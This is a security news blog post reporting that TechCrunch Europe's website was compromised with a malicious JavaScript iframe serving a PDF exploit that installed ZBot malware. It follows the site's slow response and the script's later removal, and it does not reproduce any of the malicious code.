TechCrunch Europe serves up malware attack

Graham Cluley
Graham Cluley
@
@[email protected]
@gcluley

TechCrunch Europe
Updated The European website of TechCrunch (eu.techcrunch.com), one of the world’s most popular blogs, appears to have fallen victim to hackers, who have planted a malicious script on their site, designed to infect unsuspecting visitors.

TechCrunch Europe posted a message on its Twitter feed earlier today describing warnings about malware being distributed via the site as “annoying”. Perhaps a rather unusual turn of phrase, which might suggest to observers that the warnings were erroneous rather than the result of a serious security problem.

TechCrunch tweets out warning

A closer examination of TechCrunch Europe’s site reveals that the offending code – which uses a malicious iFrame – is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family.

Sign up to our free newsletter.
Security news, advice, and tips.

Malicious code on the TechCrunch Europe website

Sophos customers who have already switched on the “Live Protection” in version Sophos Endpoint Security and Data Protection 9.5, are already protected – benefiting from our very latest in-the-cloud technology to defend against the latest threats like this, efficiently and proactively. There’s a lesson here: “If you are using Sophos version 9.5, turn on live protection!” It’s worth it!

Users of some web browsers may also be protected – for instance, here’s a screenshot of Firefox intercepting one of the infected pages on TechCrunch Europe.

Firefox intercepting dangerous page on TechCrunch Europe

The problem appears to have been present on TechCrunch Europe’s website for some time, and yet there’s been no obvious warning to visitors posted on its site nor – seemingly – no attempt to remove the malicious script or block users from visiting the infected pages.

One has to wonder whether malicious hackers are taking advantage of the Labor Day holiday in North America today which may mean that less of TechCrunch’s support team (who might be able to fix this problem) are available today.

SophosLabs have analysed the malware being spread via the infection, which we detect as Troj/Zbot-YP.

Update Andy Brett, an engineer who works for TechCrunch in California contacted me at about 10pm UK time, to tell me that the malicious JavaScript code has been removed from the site, although it may take some time before browsers which rely on third-party blacklists stop warning about pages on the site.

Ideally TechCrunch will post a message on its site (on the TechCrunch Europe site, at least) informing users about the incident and advising that they check their PCs with an up-to-date anti-virus. I don’t see any message to that effect yet on that site – but I’m hopeful.

Yes, some firms are embarrassed when their websites become infected – and it’s not the kind of event that we would wish upon anyone. But let’s not forget that TechCrunch is the victim of a criminal act, and although in an ideal world their site would not have been compromised in this way they are not – ultimately – the ones to blame for the wrongdoing.

What they can do, as a responsible member of the internet community, is advise anyone who might have visited the site while it was infected to double-check their computer systems. That’s the kind of behaviour that we would expect of any website that suffered a security problem – and is, indeeed, the kind of behaviour that technology media websites like TechCrunch would expect from others too.

Hat-tip: Thanks to @theharmonyguy who first made me aware of this issue.


Graham Cluley is an award-winning keynote speaker who has given presentations around the world about cybersecurity, hackers, and online privacy. A veteran of the computer security industry since the early 1990s, he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows, makes regular media appearances, and is the co-host of the popular "Smashing Security" podcast. Follow him on Twitter, Mastodon, Threads, Bluesky, or drop him an email.

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.